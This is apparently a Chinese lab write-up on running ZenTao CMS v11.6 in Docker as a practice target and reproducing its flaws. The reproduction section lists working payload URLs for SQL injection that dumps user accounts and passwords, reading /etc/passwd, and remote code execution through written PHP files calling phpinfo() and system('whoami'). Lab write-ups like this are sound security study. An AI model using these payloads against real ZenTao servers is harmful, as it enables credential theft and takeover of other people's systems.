一、环境搭建
linux环境下的
在docker环境下安装禅道CMS V11.6
docker run --name zentao_v11.6 -p 8084:80 -v /u01/zentao/www:/app/zentaopms -v /u01/zentao/data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -d docker.io/yunwisdom/zentao:v11.6
二、常见问题
1.删除Docker容器镜像报错(同样适用于,在Docker下搭建靶场无法启用的方法)
不能删除正在运行的容器,需要先停止进程
再查看时就看到此靶场的进程被删除了
重新安装
查看当前进程,现实容器启用
扩展:Docker下的搭建靶场无法启用其他可能方法
①重启kali,在开启容器
登录后台时密码错误(输入正确密码还是登陆失败)
①可能是8084端口没开
②http://172.0.0.1:8084/install.php(注意标红的位置,进行重新安装以下尝试)
三、漏洞复现
1.SQL注入
Payload
http://127.0.0.1/api-getModel-api-sql-sql=select+account,password+from+zt_user
Poc访问结果
2.任意文件读取
Payload
http://127.0.0.1/api-getModel-file-parseCSV-fileName=/etc/passwd
Poc访问结果
3.RCE
Payload1
http://127.0.0.1/api-getModel-api-getMethod-filePath=1111/1
fileContent=<?php phpinfo()?>
Poc访问结果
Payload2
http://127.0.0.1/api-getModel-api-getMethod-filePath=2222/2
fileContent=<?php system('whoami');?>
